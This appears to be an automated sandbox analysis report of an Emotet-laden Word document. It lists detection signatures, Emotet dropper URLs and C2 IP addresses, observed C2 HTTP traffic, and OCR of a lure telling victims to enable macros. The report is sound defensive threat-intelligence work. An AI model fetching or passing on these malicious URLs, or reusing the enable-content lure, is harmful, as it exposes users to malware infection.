Analysis Report DAT.doc

Overview

General Information

Sample Name: DAT.doc
Analysis ID: 344355
MD5: 6792d7fd9d2f9237cd31d1234edcec03
SHA1: af8329cc3d379f678aac5f2a1b83a7697dd190af
SHA256: 55f177ec4613b1b03a37199e3c7d49336dd424a66737f79005208aa9883b192b

Most interesting Screenshot:

Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Potential dropper URLs found in powershell memory
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to delete services
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection:

Antivirus detection for URL or domain
Source: https://johnhaydenwrites.com/track_url/P/ Avira URL Cloud: Label: malware
Source: https://nahlasolimandesigns.com/nahla3/d/ Avira URL Cloud: Label: malware
Source: https://vietnhabienhoa.com/wordpress/QUTy/P Avira URL Cloud: Label: malware
Source: http://hbprivileged.com/cgi-bin/kcggF/ Avira URL Cloud: Label: malware
Source: http://zenithcampus.com/l/yQ/ Avira URL Cloud: Label: malware
Source: https://football-eg.com/web_map/n/ Avira URL Cloud: Label: malware
Source: https://vietnhabienhoa.com/wordpress/QUTy/ Avira URL Cloud: Label: malware
Multi AV Scanner detection for dropped file
Source: C:\Users\user\O_wgqv7\C0316em\Lyeta6ud.dll Metadefender: Detection: 56%
Source: C:\Users\user\O_wgqv7\C0316em\Lyeta6ud.dll ReversingLabs: Detection: 75%
Multi AV Scanner detection for submitted file
Source: DAT.doc Virustotal: Detection: 71%
Source: DAT.doc ReversingLabs: Detection: 82%
Machine Learning detection for dropped file
Source: C:\Users\user\O_wgqv7\C0316em\Lyeta6ud.dll Joe Sandbox ML: detected

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_0020A69B CryptDecodeObjectEx, 20_2_0020A69B

Compliance:

Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Binary contains paths to debug symbols
Source: Binary string: C:\Windows\symbols\dll\System.pdbom source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source: Binary string: <ystem.pdbF source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source: Binary string: ws\System.pdbpdbtem.pdb\a source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source: Binary string: System.pdb* source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.pdbon.dll source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source: Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2139174857.0000000002380000.00000002.00000001.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.pdb5\ source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_002075F0 FindFirstFileW, 20_2_002075F0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: zenithcampus.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 167.71.148.58:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 35.200.206.198:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2404314 ET CNC Feodo Tracker Reported CnC Server TCP group 8 192.168.2.22:49169 -> 184.66.18.83:80
Source: Traffic Snort IDS: 2404310 ET CNC Feodo Tracker Reported CnC Server TCP group 6 192.168.2.22:49172 -> 167.71.148.58:443
Potential dropper URLs found in powershell memory
Source: powershell.exe, 00000005.00000002.2144577407.0000000003AC2000.00000004.00000001.sdmp String found in memory: http://zenithcampus.com/l/yQ/
Source: powershell.exe, 00000005.00000002.2144577407.0000000003AC2000.00000004.00000001.sdmp String found in memory: http://hbprivileged.com/cgi-bin/kcggF/
Source: powershell.exe, 00000005.00000002.2144577407.0000000003AC2000.00000004.00000001.sdmp String found in memory: http://localaffordableroofer.com/ralphs-receipt-f2uhf/qTT5DC/
Source: powershell.exe, 00000005.00000002.2144577407.0000000003AC2000.00000004.00000001.sdmp String found in memory: https://johnhaydenwrites.com/track_url/P/
Source: powershell.exe, 00000005.00000002.2144577407.0000000003AC2000.00000004.00000001.sdmp String found in memory: https://nahlasolimandesigns.com/nahla3/d/
Source: powershell.exe, 00000005.00000002.2144577407.0000000003AC2000.00000004.00000001.sdmp String found in memory: https://football-eg.com/web_map/n/
Source: powershell.exe, 00000005.00000002.2144577407.0000000003AC2000.00000004.00000001.sdmp String found in memory: https://vietnhabienhoa.com/wordpress/QUTy/
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /l/yQ/ HTTP/1.1Host: zenithcampus.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ralphs-receipt-f2uhf/qTT5DC/ HTTP/1.1Host: localaffordableroofer.comConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 167.71.148.58 167.71.148.58
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
Source: Joe Sandbox View ASN Name: GOOGLEUS GOOGLEUS
Source: Joe Sandbox View ASN Name: TTNET-MYTIMEdotComBerhadMY TTNET-MYTIMEdotComBerhadMY
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /um49al9zetvy1g5wmnt/twmd2l9pj/0k1iudym/ag1m0i31pvl6lis/m8khm/21qx1r3lmxejnl/ HTTP/1.1DNT: 0Referer: 167.71.148.58/um49al9zetvy1g5wmnt/twmd2l9pj/0k1iudym/ag1m0i31pvl6lis/m8khm/21qx1r3lmxejnl/Content-Type: multipart/form-data; boundary=-----------------------z2vqH5ZpSVZftRl6dB758VDUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 167.71.148.58:443Content-Length: 5908Connection: Keep-AliveCache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 184.66.18.83
Source: unknown TCP traffic detected without corresponding DNS query: 184.66.18.83
Source: unknown TCP traffic detected without corresponding DNS query: 202.187.222.40
Source: unknown TCP traffic detected without corresponding DNS query: 202.187.222.40
Source: unknown TCP traffic detected without corresponding DNS query: 202.187.222.40
Source: unknown TCP traffic detected without corresponding DNS query: 202.187.222.40
Source: unknown TCP traffic detected without corresponding DNS query: 202.187.222.40
Source: unknown TCP traffic detected without corresponding DNS query: 202.187.222.40
Source: unknown TCP traffic detected without corresponding DNS query: 167.71.148.58
Source: unknown TCP traffic detected without corresponding DNS query: 167.71.148.58
Source: unknown TCP traffic detected without corresponding DNS query: 167.71.148.58
Source: unknown TCP traffic detected without corresponding DNS query: 167.71.148.58
Source: unknown TCP traffic detected without corresponding DNS query: 167.71.148.58
Source: unknown TCP traffic detected without corresponding DNS query: 167.71.148.58
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_0020280B InternetReadFile, 20_2_0020280B
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{1BCD45F3-025D-4403-9DBE-B492A11253DC}.tmp
Source: global traffic HTTP traffic detected: GET /l/yQ/ HTTP/1.1Host: zenithcampus.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ralphs-receipt-f2uhf/qTT5DC/ HTTP/1.1Host: localaffordableroofer.comConnection: Keep-Alive
Source: rundll32.exe, 00000006.00000002.2144951796.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2140287437.0000000001DB0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2142959855.0000000001EC0000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown DNS traffic detected: queries for: zenithcampus.com
Source: unknown HTTP traffic detected: POST /um49al9zetvy1g5wmnt/twmd2l9pj/0k1iudym/ag1m0i31pvl6lis/m8khm/21qx1r3lmxejnl/ HTTP/1.1DNT: 0Referer: 167.71.148.58/um49al9zetvy1g5wmnt/twmd2l9pj/0k1iudym/ag1m0i31pvl6lis/m8khm/21qx1r3lmxejnl/Content-Type: multipart/form-data; boundary=-----------------------z2vqH5ZpSVZftRl6dB758VDUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 167.71.148.58:443Content-Length: 5908Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3 (Ubuntu)Date: Tue, 26 Jan 2021 12:48:36 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-transform, no-cache, no-store, must-revalidateLink: <https://zenithcampus.com/wp-json/>; rel="https://api.w.org/"Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Source: powershell.exe, 00000005.00000002.2140062239.0000000002CC6000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2144577407.0000000003AC2000.00000004.00000001.sdmp String found in binary or memory: http://hbprivileged.com/cgi-bin/kcggF/
Source: rundll32.exe, 00000006.00000002.2144951796.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2140287437.0000000001DB0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2142959855.0000000001EC0000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000006.00000002.2144951796.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2140287437.0000000001DB0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2142959855.0000000001EC0000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com/
Source: powershell.exe, 00000005.00000002.2141813649.00000000031C0000.00000004.00000001.sdmp String found in binary or memory: http://localaffordableroofer.com
Source: powershell.exe, 00000005.00000002.2140062239.0000000002CC6000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2144577407.0000000003AC2000.00000004.00000001.sdmp String found in binary or memory: http://localaffordableroofer.com/ralphs-receipt-f2uhf/qTT5DC/
Source: rundll32.exe, 00000006.00000002.2146720602.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2140682913.0000000001F97000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2143404795.00000000020A7000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000006.00000002.2146720602.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2140682913.0000000001F97000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2143404795.00000000020A7000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000005.00000002.2139305270.0000000002470000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2143212470.0000000002770000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2144888495.0000000002780000.00000002.00000001.sdmp, rundll32.exe, 00000012.00000002.2164826084.0000000002860000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000006.00000002.2146720602.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2140682913.0000000001F97000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2143404795.00000000020A7000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000006.00000002.2146720602.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2140682913.0000000001F97000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2143404795.00000000020A7000.00000002.00000001.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000005.00000002.2139305270.0000000002470000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2143212470.0000000002770000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2144888495.0000000002780000.00000002.00000001.sdmp, rundll32.exe, 00000012.00000002.2164826084.0000000002860000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: rundll32.exe, 00000006.00000002.2144951796.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2140287437.0000000001DB0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2142959855.0000000001EC0000.00000002.00000001.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000006.00000002.2146720602.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2140682913.0000000001F97000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2143404795.00000000020A7000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000006.00000002.2144951796.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2140287437.0000000001DB0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2142959855.0000000001EC0000.00000002.00000001.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: powershell.exe, 00000005.00000002.2137911907.00000000002C7000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/cclea
Source: powershell.exe, 00000005.00000002.2137911907.00000000002C7000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000005.00000002.2137911907.00000000002C7000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: rundll32.exe, 00000008.00000002.2142959855.0000000001EC0000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000005.00000002.2140062239.0000000002CC6000.00000004.00000001.sdmp String found in binary or memory: http://zenithcampus.com
Source: powershell.exe, 00000005.00000002.2140062239.0000000002CC6000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2144577407.0000000003AC2000.00000004.00000001.sdmp String found in binary or memory: http://zenithcampus.com/l/yQ/
Source: powershell.exe, 00000005.00000002.2141813649.00000000031C0000.00000004.00000001.sdmp String found in binary or memory: https://api.w.org/
Source: powershell.exe, 00000005.00000002.2140062239.0000000002CC6000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2144577407.0000000003AC2000.00000004.00000001.sdmp String found in binary or memory: https://football-eg.com/web_map/n/
Source: powershell.exe, 00000005.00000002.2140062239.0000000002CC6000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2144577407.0000000003AC2000.00000004.00000001.sdmp String found in binary or memory: https://johnhaydenwrites.com/track_url/P/
Source: powershell.exe, 00000005.00000002.2140062239.0000000002CC6000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2144577407.0000000003AC2000.00000004.00000001.sdmp String found in binary or memory: https://nahlasolimandesigns.com/nahla3/d/
Source: powershell.exe, 00000005.00000002.2144577407.0000000003AC2000.00000004.00000001.sdmp String found in binary or memory: https://vietnhabienhoa.com/wordpress/QUTy/
Source: powershell.exe, 00000005.00000002.2140062239.0000000002CC6000.00000004.00000001.sdmp String found in binary or memory: https://vietnhabienhoa.com/wordpress/QUTy/P
Source: powershell.exe, 00000005.00000002.2141813649.00000000031C0000.00000004.00000001.sdmp String found in binary or memory: https://zenithcampus.com/wp-json/
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49172
Source: unknown Network traffic detected: HTTP traffic on port 49172 -> 443

E-Banking Fraud:

Yara detected Emotet
Source: Yara match File source: 0000000F.00000002.2153905031.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2155916188.00000000001B1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2150770541.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2147679834.0000000000311000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2162568948.0000000000211000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2141920127.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2159102288.0000000000211000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2152460695.00000000001C1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2358984806.0000000000140000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2155772363.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2157336614.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2143541090.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2157449477.00000000001D1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2143576393.00000000001C1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2147601789.00000000002F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2150877098.00000000001D1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2141994054.00000000001C1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2162462473.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2149091905.0000000000250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2146032293.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2359036210.00000000001F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2150116994.00000000004A1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2146169134.0000000000201000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2153961508.00000000001B1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2152298877.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2158760347.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 18.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.rundll32.exe.140000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.2f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.1d0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.4a0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.310000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.250000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.250000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.1d0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.1b0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.2f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.1b0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.rundll32.exe.140000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Document image extraction number: 0 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 1 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\O_wgqv7\C0316em\Lyeta6ud.dll
Very long command line found
Source: unknown Process created: Commandline size = 7696
Source: unknown Process created: Commandline size = 7605
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 7605
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
